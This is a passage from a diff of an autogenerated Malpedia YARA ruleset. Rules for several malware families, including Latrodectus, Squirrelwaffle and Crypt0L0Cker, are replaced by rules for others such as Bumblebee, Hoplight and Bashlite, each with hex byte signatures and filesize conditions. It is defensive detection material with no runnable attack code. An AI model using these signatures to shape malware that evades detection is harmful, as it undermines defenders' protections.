+		$sequence_76 = { 8b483c 6689ce 6683fe00 89c2 8945e8 }
+		$sequence_77 = { 890424 e8???????? 31c9 8b54241c 8b723c 8b7e3c 89f3 }
+		$sequence_78 = { e8???????? 89442418 e8???????? 83f800 }
+		$sequence_79 = { 8b513c 6689d6 6683fe00 89cf 8945f0 894dec }
+		$sequence_80 = { 01ca 83c205 807c0805e9 891424 74e9 8b0424 }
+		$sequence_81 = { 7418 8b45f4 05ffff0000 25ffff0000 }
+		$sequence_82 = { 8945c4 894dc0 885dbf 8975b8 }
+		$sequence_83 = { c7424800b00400 8b7de4 c787cc00000000000000 c787c800000000000000 8945dc }
+		$sequence_84 = { c3 55 89e5 57 56 53 83ec54 }
+		$sequence_85 = { 89c6 8945f8 894df4 8975f0 7418 8b45f4 }
+		$sequence_86 = { 57 83ec38 8b450c 8b4d08 }
+		$sequence_87 = { 83c454 5b 5e 5f 5d c3 55 }
+		$sequence_88 = { 01c1 894df0 8b45f0 83c40c 5e 5d }
+		$sequence_89 = { 25ffff0000 83c001 8b4df8 01c1 894df0 8b45f0 }
+		$sequence_90 = { 25ffff0000 83c001 8b4da8 01c1 }
+		$sequence_91 = { 5b 5e 5d c3 55 89e5 6a00 }
+		$sequence_92 = { e9???????? 8b45e0 83c45c 5f 5b 5e }
+		$sequence_93 = { 53 57 83ec5c 8b450c }
+		$sequence_94 = { 5b 5d c3 8b45d0 8b4dd4 }
+		$sequence_95 = { 57 83ec20 8b4508 890424 8945f0 }
+		$sequence_96 = { 8b0c8504406e00 8b55f8 39d1 8945ec }
+		$sequence_97 = { 8955c8 895dc4 8945e4 0f85dafeffff 8b45e4 83c474 5b }
+		$sequence_98 = { 53 83ec74 8b450c 8b4d08 31d2 }
+		$sequence_99 = { 53 56 83ec38 8b450c }
+		$sequence_100 = { 83c470 5b 5f 5e 5d c3 }
+		$sequence_101 = { 5d c3 8b45f0 8b0c8504406e00 8b55f8 }
+		$sequence_102 = { 7505 e9???????? 8b45e0 83c438 5e 5b 5f }
+		$sequence_103 = { 53 81ecb0000000 8b4508 8d4dd8 }
+		$sequence_104 = { 75e4 83c448 5e 5f 5b 5d }
+		$sequence_105 = { 8955cc 74bc 8b45cc 83c454 5b 5e }
+		$sequence_106 = { 8b4508 8d0d30306e00 31d2 890c24 }
+		$sequence_107 = { e8???????? 8d0dd8302400 890424 894c2404 }
+		$sequence_108 = { c3 55 89e5 53 56 57 83ec38 }
+		$sequence_109 = { 033c8a 897dd8 8b45d8 83c444 5b 5e }
+		$sequence_110 = { e9???????? 8b45e0 83c438 5f 5e 5b }
+		$sequence_111 = { 8945a8 0f84e2feffff e9???????? 8b45e0 83c45c 5e 5f }
+		$sequence_112 = { c3 55 89e5 56 53 57 83ec54 }
+		$sequence_113 = { 8d0dbc306e00 890424 894c2404 e8???????? }
+		$sequence_114 = { 8b55f4 8b75ec 89723c c7424004000000 c742442c0c0200 c7424800b00400 }
+		$sequence_115 = { 894628 890c24 c744240400000000 8955dc e8???????? 8d0de8306e00 890424 }
+		$sequence_116 = { e8???????? 8d0d44306e00 31d2 8b75f8 894620 }
+		$sequence_117 = { 8b45cc 83c454 5f 5b 5e 5d }
+		$sequence_118 = { 8d0d44302f00 31d2 890c24 c744240400000000 8945fc 8955f8 e8???????? }
+		$sequence_119 = { 8955c8 8945d0 74e4 31c0 8d0d5a232f00 }
+		$sequence_120 = { 8d0d44308400 31d2 8b75f8 89460c }
+		$sequence_121 = { c3 55 89e5 8d055a238400 5d c3 55 }
+		$sequence_122 = { 53 83ec44 8b4508 8d0d30302700 }
+		$sequence_123 = { 53 83ec54 8d055a238400 31c9 8d55d8 }
+		$sequence_124 = { 890c24 c744240400000000 8955e8 e8???????? 8d0dbc308400 }
 
 	condition:
-		7 of them and filesize < 35788800
+		7 of them and filesize < 1040384
 }
-rule MALPEDIA_Win_Latrodectus_Auto : FILE
+rule MALPEDIA_Win_Hoplight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02322cd8-96f0-5b56-94f1-88df3945f27c"
+		id = "a2aa7245-0542-5f03-ac64-64c8e4dfd14a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.latrodectus_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hoplight_auto.yar#L1-L106"
 		license_url = "N/A"
-		logic_hash = "91b2f62d96756249c5bc2116ba49c8b0c1df538f3c82f3888f308bd5e8fea475"
+		logic_hash = "00943ab9210fcdddaf459f640db07e69da7180851bcc89590390e262f5274de2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108651,32 +108876,30 @@ rule MALPEDIA_Win_Latrodectus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b442420 4883c002 488bc8 e8???????? 4889442428 }
-		$sequence_1 = { 4889842438010000 4c8d442430 488b942430010000 488b8c2438010000 }
-		$sequence_2 = { 85c0 742b e8???????? 85c0 7422 e8???????? }
-		$sequence_3 = { 4c8b8c24a0000000 450fb74904 6641c1c908 450fb7c9 4c8b9424a0000000 450fb712 6641c1ca08 }
-		$sequence_4 = { ff15???????? 8b4c2420 0fafc8 8bc1 89442424 8b4c2424 }
-		$sequence_5 = { ba50020000 488d8c2490000000 e8???????? 488d942490000000 488b4c2420 ff15???????? 4889442430 }
-		$sequence_6 = { eb31 8b442448 8bd0 488b442440 488b08 e8???????? }
-		$sequence_7 = { eb1e 488b8424b8000000 8b4c2444 8908 488b8424c8000000 0fb74c2454 668908 }
-		$sequence_8 = { 488b442430 8b401c 488b4c2470 4803c8 488bc1 488b4c2450 }
-		$sequence_9 = { 8b442428 390424 732f 8b442408 c1e808 8b0c24 488b542420 }
+		$sequence_0 = { 488bcf ff15???????? 488d442430 4c8d442440 4533c9 33d2 }
+		$sequence_1 = { 488d942428010000 488d4c2440 e8???????? 488d8c2450010000 e8???????? 488b842450020000 }
+		$sequence_2 = { 0bc1 25ff000000 89842410040000 8b842410040000 83f063 8b8c2414040000 }
+		$sequence_3 = { 4863442420 488b4c2470 8b848138100000 89442424 4863442424 488b4c2448 }
+		$sequence_4 = { 48638c2484040000 486bc910 488d4c0c40 488d942440040000 4889542420 448b8c2454040000 }
+		$sequence_5 = { 4883f8ff 7443 488d542420 488bc8 c744242038020000 ff15???????? }
+		$sequence_6 = { 488b842498000000 48898424a8000000 488b8424c8000000 4889842498000000 488b8424a8000000 8b00 }
+		$sequence_7 = { 81e1ff000000 8bc9 488d15966d0200 33048a 8b4c2428 c1e918 }
 
 	condition:
-		7 of them and filesize < 173056
+		7 of them and filesize < 765952
 }
-rule MALPEDIA_Win_Splitloader_Auto : FILE
+rule MALPEDIA_Win_Graphican_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "134d8226-eb7c-5031-8a1c-a24d18923a11"
+		id = "82332df7-f8b2-5311-821b-79a046dc5e4d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.splitloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.splitloader_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphican_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "61ea1a460bed6edfbafde374a204cb805d347ddcc6924015d5eb07560b9fca84"
+		logic_hash = "e01b6a4a7e17b3788b0929c107b93003400ca0366bc88f55631d49ec789512b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108690,32 +108913,32 @@ rule MALPEDIA_Win_Splitloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bc8 ff15???????? 4c8bd8 488905???????? 4885c0 7422 488d151d420000 }
-		$sequence_1 = { 48014d00 418b4c241c 418984240cab0000 418b8424f82a0000 894d4c 488b8c2488000000 3bce }
-		$sequence_2 = { 4c8d5801 4889442448 4c85d8 0f85ff150000 }
-		$sequence_3 = { 488bc8 458d4104 4889742420 ff15???????? 4533c9 }
-		$sequence_4 = { e9???????? 8a03 488d1535c30000 ffc7 4a8b0ce2 4188440f4c 4a8b04e2 }
-		$sequence_5 = { 895dac 895dbc 895df0 4c894dd0 }
-		$sequence_6 = { 0f8c92000000 41838c24042b000001 85c0 0f84ad000000 8b4118 4c8b4910 488b11 }
-		$sequence_7 = { 782e 3b0d???????? 7326 4863c9 488d150c930000 488bc1 }
-		$sequence_8 = { eb77 4c89ac2400080000 4c8b6808 488b00 39b08c000000 744a 8b9888000000 }
-		$sequence_9 = { 4c8d0513700000 41b903000000 488d4c45bc 488bc1 492bc5 48d1f8 }
+		$sequence_0 = { 57 894e08 8b15???????? 8d4610 53 50 89560c }
+		$sequence_1 = { b860200000 e8???????? a1???????? 33c5 8945fc 8b4508 }
+		$sequence_2 = { 57 52 50 e8???????? 83c40c 8bc7 }
+		$sequence_3 = { 750e 8b07 8b4808 ffd1 33c0 e9???????? 8b17 }
+		$sequence_4 = { 8d46e7 5e 8915???????? 5b e8???????? }
+		$sequence_5 = { 8b450c 50 56 51 e8???????? }
+		$sequence_6 = { 50 68???????? 6a00 e8???????? 8bc8 83c418 }
+		$sequence_7 = { ffd1 83bde8efffff10 0f82f8000000 8b8dd4efffff }
+		$sequence_8 = { 51 50 ffd2 8bb5c4efffff 33ff 899dd0efffff 899dc8efffff }
+		$sequence_9 = { ddd8 897dc0 8b450c 8b55c4 8938 895004 }
 
 	condition:
-		7 of them and filesize < 174080
+		7 of them and filesize < 362496
 }
-rule MALPEDIA_Win_Rokku_Auto : FILE
+rule MALPEDIA_Win_Bumblebee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "715ad7bc-d28a-5156-87eb-1255d9ce2084"
+		id = "bb13bacf-dfd1-5f67-a954-b108745cbd18"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rokku_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bumblebee_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "1d23d8f4257081bb086c98f92ac75f2d433e54c9fb6c0c1b7b21d511b54ccc0a"
+		logic_hash = "1740917da778479acf746acdc75f2beb6821c321be8f136bbd653a625bc1c0f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108729,32 +108952,32 @@ rule MALPEDIA_Win_Rokku_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750b 3944242c 7523 b805000080 3d06000080 7517 57 }
-		$sequence_1 = { 66c745fd5352 885dff 80441de5fa 43 83fb1a 72f5 }
-		$sequence_2 = { 8bce e8???????? 0f2805???????? 8bcb 0f1145cf }
-		$sequence_3 = { 01442414 13ea 8b542414 8bca 81c100000002 83d500 }
-		$sequence_4 = { 8bc7 894a0c 8b4c241c 0fa4c11a 8b4c2410 c1e01a 2bc8 }
-		$sequence_5 = { 13da f76c2460 03f8 8b44242c }
-		$sequence_6 = { 8d84244c080000 53 50 e8???????? be00080000 8d442454 56 }
-		$sequence_7 = { 75f7 c60607 46 83ed01 75f7 6a08 8d442434 }
-		$sequence_8 = { c645ff00 885dfe 8d55e0 33db c645fd27 50 885dff }
-		$sequence_9 = { e8???????? b935010000 b8???????? 03c1 51 50 e8???????? }
+		$sequence_0 = { 0f849b010000 be80030000 488d4c2470 448bc6 }
+		$sequence_1 = { 488b4108 488bd9 4183c9ff 4889442428 }
+		$sequence_2 = { ff15???????? 90 33c0 488b5c2448 }
+		$sequence_3 = { 4881ec20040000 488b05???????? 4833c4 48898518030000 4c8bf1 }
+		$sequence_4 = { b8c0000000 4803fe ba64860000 66395304 8d4810 0f44c1 }
+		$sequence_5 = { 498bce ffd0 85c0 0f8895000000 8b7b28 b8c0000000 4803fe }
+		$sequence_6 = { 488bd8 c744243802000000 488d442450 4889442430 4c8bc6 488d842498000000 488bd5 }
+		$sequence_7 = { 4885d2 7411 4883c208 4883c108 }
+		$sequence_8 = { 48833b00 480f453b 488bcb e8???????? 488bc7 488b8d18030000 4833cc }
+		$sequence_9 = { 33db 4d8bf0 4c8bea 48895d48 8bf1 48895dc8 33d2 }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 4825088
 }
-rule MALPEDIA_Win_Mocton_Auto : FILE
+rule MALPEDIA_Win_Divergent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0eb53608-52dd-5157-b27a-400060a227c2"
+		id = "11ec65d7-b0ac-595b-ba44-5bae97099c0e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mocton_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.divergent_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "ab360491efcec62323f6bd101f123d7a2664b6f36f37ac6acc5b7e8f64a1cf18"
+		logic_hash = "ce2ba9c31c93d1d30382978d9975d2fc77a1697c44fa31feb01e0ffcff44bfb5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108768,32 +108991,32 @@ rule MALPEDIA_Win_Mocton_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b8ee2fba29 2b8540fdffff 898540fdffff eb59 8b8dc8fcffff 69c9360d54b3 33d2 }
-		$sequence_1 = { 8945e8 e9???????? 8b4dd4 83e901 894dd4 8b55d4 69d240107496 }
-		$sequence_2 = { 33c0 399570feffff 0f9dc0 338570feffff 8b8d70feffff 83e901 898d70feffff }
-		$sequence_3 = { 8b8518fcffff 2bc2 898518fcffff 6a01 8b4dc0 51 e8???????? }
-		$sequence_4 = { 250b378f61 3385e8fbffff 3385e8fbffff 8b8de8fbffff 83e901 898de8fbffff 85c0 }
-		$sequence_5 = { 8d840afae31ce1 8945c4 c745bc9d7d7759 c745ecf8eddc22 c745d8e052b31e 8b4dec 81f1995c274e }
-		$sequence_6 = { 50 8b0d???????? 51 e8???????? 83c408 c78550fbfffffb90ba4f c78518fbffff55263138 }
-		$sequence_7 = { 0faf45b8 0345b8 2345b8 8945b8 8b4db8 }
-		$sequence_8 = { 2b8594e9ffff 8b8d94e9ffff 8b9594e9ffff 83c201 899594e9ffff 3bc8 0f8c86000000 }
-		$sequence_9 = { 0f9dc1 81e1b0c00d60 740c 8b55f0 81e2803636b3 8955f0 eb1d }
+		$sequence_0 = { 85ff 0f8400010000 53 56 8b7508 57 }
+		$sequence_1 = { 50 e8???????? 83c40c 8d45f8 6a02 6a08 50 }
+		$sequence_2 = { 3b4510 7518 ff7510 8b4704 ff750c }
+		$sequence_3 = { e9???????? 57 bf???????? 57 ff15???????? 85c0 7474 }
+		$sequence_4 = { 0f888cfeffff 85f6 7402 03f0 03f8 33c9 }
+		$sequence_5 = { 742c 8b463c ff743054 56 57 }
+		$sequence_6 = { 8955fc 2500000080 df6df8 8365f800 8945fc }
+		$sequence_7 = { 84c0 7512 8b45fc 40 817d0c1a000080 }
+		$sequence_8 = { 8b4608 8b0488 eb02 33c0 5e 5d }
+		$sequence_9 = { 833fff 7437 8d4628 50 ff37 e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE
+rule MALPEDIA_Win_Combos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c61157f1-60e2-5b06-a116-a20987079807"
+		id = "83be0118-da53-5a8d-831d-9e770a5f717d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.squirrelwaffle_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.combos_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "9eaea34205659a464bf5b301bb94e11eb962293c24be78788f1b35d437de22a1"
+		logic_hash = "f3e6fe545b99111283539f520a90d4bf3b968444eac10c20521004e7b16afe6f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108807,32 +109030,32 @@ rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8bd8 83c40c 85db 0f84d0000000 8bce }
-		$sequence_1 = { c7855cf7ffff00000000 c78560f7ffff0f000000 8b00 3bc7 c6854cf7ffff00 0f42f8 833910 }
-		$sequence_2 = { 0f8484000000 8d442410 50 ff764c }
-		$sequence_3 = { 8d8d18f9ffff 51 68???????? 50 ff15???????? 85c0 }
-		$sequence_4 = { 8d4dd8 ff75cc 6a08 e8???????? e9???????? b301 }
-		$sequence_5 = { 0f88da000000 83f801 0f8fa8000000 8b75e8 8d45d4 8b7dd4 }
-		$sequence_6 = { 8bca 0430 8806 8bc2 898568f7ffff }
-		$sequence_7 = { 2bc1 83f808 7221 8d4108 83fe10 8945e4 }
-		$sequence_8 = { 6a08 e8???????? e9???????? 8b5d08 eb32 }
-		$sequence_9 = { c645cc00 8d4dd8 ff75cc 6a08 }
+		$sequence_0 = { 8bd8 899dd8feffff 3bdf 0f84a2000000 8b7d0c 83c9ff }
+		$sequence_1 = { 83e33f 33d3 c1f804 8b9c9600030000 8a51ff 0bfb }
+		$sequence_2 = { c1f805 8d1c85201b0110 8b4508 83e01f 8d34c0 }
+		$sequence_3 = { 53 56 8b8dd8feffff 51 57 68ffff1f00 }
+		$sequence_4 = { 85db 750b 8d4eff 3bf9 8b4c2410 }
+		$sequence_5 = { ff15???????? 8bd0 8995d8feffff 3bd3 0f847d010000 }
+		$sequence_6 = { 48 8bf0 c1f803 83e607 0fbe0410 8504b548930010 0f95c0 }
+		$sequence_7 = { 8b0c8d201b0110 8d04c0 f644810401 7425 57 56 e8???????? }
+		$sequence_8 = { 50 56 e8???????? 8945d0 8b7d08 }
+		$sequence_9 = { 8bd0 2be8 89542414 eb04 8b542414 33c0 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Hzrat_Auto : FILE
+rule MALPEDIA_Win_Gspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3d57e55-1483-5768-a078-1e6af35b2fc8"
+		id = "5725a0eb-387e-5f55-9c61-97bda1555361"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hzrat_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gspy_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "caebe3b063bb24ee2db19144295d7a39f41baf69a2ce331f663ee48cf20d8acf"
+		logic_hash = "c2942f87aa0e0d3cd7efb2debc57b53c46a950e05b62dce63b5340d2d7cb5666"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108846,32 +109069,32 @@ rule MALPEDIA_Win_Hzrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff7704 ff15???????? 85c0 7516 5f }
-		$sequence_1 = { 8d85f0fbffff 50 56 e8???????? 83c40c c6043e00 eb1e }
-		$sequence_2 = { 8b4130 8b7804 8bcf 897dd8 8b07 ff5004 6a00 }
-		$sequence_3 = { 0f848c000000 6a04 c645e802 ff15???????? }
-		$sequence_4 = { 56 8bf0 898588feffff 57 56 e8???????? 8b8de1feffff }
-		$sequence_5 = { 03fe 83bd7cfeffff00 7476 85ff }
-		$sequence_6 = { 57 e8???????? 83c404 e9???????? 6a04 68???????? 8d8d94feffff }
-		$sequence_7 = { 5b 5d c3 85c0 78f5 8b1cc564444200 6a55 }
-		$sequence_8 = { 7462 0faee8 0fb67ee2 0fb642e2 2bf8 751e 0faee8 }
-		$sequence_9 = { 884c382b 83fa03 7511 8b45fc 8a0e 46 8b048510fa4200 }
+		$sequence_0 = { 51 ff5514 46 833cb700 8d04b7 75d7 f6451001 }
+		$sequence_1 = { 8d4601 85c0 741e 83c004 50 a1???????? 6a08 }
+		$sequence_2 = { ffd7 85c0 7508 53 8d542410 52 }
+		$sequence_3 = { 807eff00 750b 803e00 740a 03c3 3bc3 }
+		$sequence_4 = { 88442424 8b442418 8b08 8d54241c 52 8b9792b04200 52 }
+		$sequence_5 = { 8d542438 52 6813000020 53 c744242404000000 c744244400000000 ff15???????? }
+		$sequence_6 = { 8b44246c 47 57 8d4c247c 8d7c241c c784248000000000100000 e8???????? }
+		$sequence_7 = { 85ed 750f 396b08 7462 833b2c 725d }
+		$sequence_8 = { 51 53 55 56 8bf0 8b4648 57 }
+		$sequence_9 = { ffd5 3d02010000 750d 803d????????00 0f85fbfeffff 5f 5e }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 421888
 }
-rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE
+rule MALPEDIA_Win_Unidentified_070_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e6b39d07-e23b-5484-8b7e-294315d68726"
+		id = "a2ac6d19-ae7e-5108-ae59-9789ab0e339d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crypt0l0cker_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_070_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "11804f6d364478c710393f9e456002818242d521693fa2a4f73173b108217067"
+		logic_hash = "45a52b7bdbd7641f0d504c35a74291eb016539e938091cf460316e51b8b9d79b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108885,32 +109108,32 @@ rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 744f 83ff73 7516 83fb09 7209 83fb0d 0f865d040000 }
-		$sequence_1 = { 8bcb e8???????? 8b7dfc 59 8d7708 56 ff15???????? }
-		$sequence_2 = { b801000000 5b 81c484000000 c3 5f 8bc6 5e }
-		$sequence_3 = { 8bbd20fdffff 59 59 83bdf8fcffff00 7417 8b8d2cfdffff 8bc1 }
-		$sequence_4 = { 33d2 898524fdffff 899d34fdffff 898d10fdffff c785e0fcffff5e010000 8995e4fcffff 8995dcfcffff }
-		$sequence_5 = { 42 33db 03fa 3bfa 6a01 58 0f42d8 }
-		$sequence_6 = { 8b04950028a900 f644180448 7452 6a0a 58 6a0d 663945f8 }
-		$sequence_7 = { 85c0 770a 7204 3bd3 7304 8bd9 2bdf }
-		$sequence_8 = { 0f85ea000000 68???????? ba48162d71 8bce e8???????? 83c404 85c0 }
-		$sequence_9 = { 8b7c2418 85c0 0f84a0000000 8d4c2420 51 50 6a00 }
+		$sequence_0 = { 6a00 6a00 6a04 50 ff15???????? 8945fc }
+		$sequence_1 = { 6a00 6a00 6a00 6a04 50 ff15???????? 8945fc }
+		$sequence_2 = { 6a00 6a00 6a04 50 ff15???????? 8945fc 85c0 }
+		$sequence_3 = { 6a04 50 ff15???????? 8945fc 85c0 }
+		$sequence_4 = { 6a00 6a04 50 ff15???????? 8945fc 85c0 }
+		$sequence_5 = { 6a00 6a04 50 ff15???????? 8945fc }
+		$sequence_6 = { 33c0 c20400 3b0d???????? 7502 }
+		$sequence_7 = { 85db 0f84af000000 6a00 6a00 }
+		$sequence_8 = { 742d 68???????? 57 ffd6 a3???????? 85c0 741c }
+		$sequence_9 = { 6808020000 8d8424d4020000 6a00 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 917504
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Netkey_Auto : FILE
+rule MALPEDIA_Elf_Bashlite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a13a2f78-42fb-5eb6-88d7-3a64826b180e"
+		id = "4d68ff86-b62a-56f4-900d-a8e2f982b0ab"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netkey_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.bashlite_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "11cc566a64ecf8a198c36c98aeaff38f948208170139e520619905a90909c22c"
+		logic_hash = "46d8bef4c939db6a89af35372d5c8a74e31ae90669b6477bbd5c0d09039a9b9b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108924,32 +109147,32 @@ rule MALPEDIA_Win_Netkey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 50 8b4604 038528fdffff 50 8b46fc 038524fdffff }
-		$sequence_1 = { f30f7e05???????? 660fd6444e10 a1???????? 89444e18 ff15???????? 8bd8 85db }
-		$sequence_2 = { 8945f8 53 56 57 8bf9 8995e0feffff 83ffff }
-		$sequence_3 = { b802000000 53 668945d8 ff15???????? 8b3d???????? 668945da }
-		$sequence_4 = { 57 33c0 8d3c9d241d4400 f00fb10f 8bc8 85c9 }
-		$sequence_5 = { 8985dcfdffff 8b85ecfdffff 6a10 8985e0fdffff 8d85d8fdffff 50 6a00 }
-		$sequence_6 = { 2bca 51 57 8d4b18 e8???????? 57 }
-		$sequence_7 = { 750b 8a45fb 88043e 46 }
-		$sequence_8 = { 83c0fc 50 e8???????? 8b8db4efffff }
-		$sequence_9 = { e8???????? 83c404 8d85f0efffff 50 6800040000 }
+		$sequence_0 = { eb0a c785ecefffff00000000 8b85ecefffff c9 c3 55 }
+		$sequence_1 = { f7d0 21d0 3345fc c9 c3 55 }
+		$sequence_2 = { 89c2 89d0 c1e81f 01d0 d1f8 }
+		$sequence_3 = { eb0a c785ecefffff00000000 8b85ecefffff c9 }
+		$sequence_4 = { e8???????? 8945ec 837dec00 750b 8b45ec }
+		$sequence_5 = { 85c0 750c c785ecefffff01000000 eb0a }
+		$sequence_6 = { eb0d e8???????? c70061000000 31d2 }
+		$sequence_7 = { 760f e8???????? c7001c000000 31c0 }
+		$sequence_8 = { 750c c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff c9 c3 }
+		$sequence_9 = { c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff c9 }
 
 	condition:
-		7 of them and filesize < 606208
+		7 of them and filesize < 2310144
 }
-rule MALPEDIA_Win_Marap_Auto : FILE
+rule MALPEDIA_Win_Voldemort_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2cc3d8fa-aa39-5bef-af3b-a091606785c2"
+		id = "115d33d2-50af-5fac-a879-fb480a2fd38a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.marap_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voldemort"
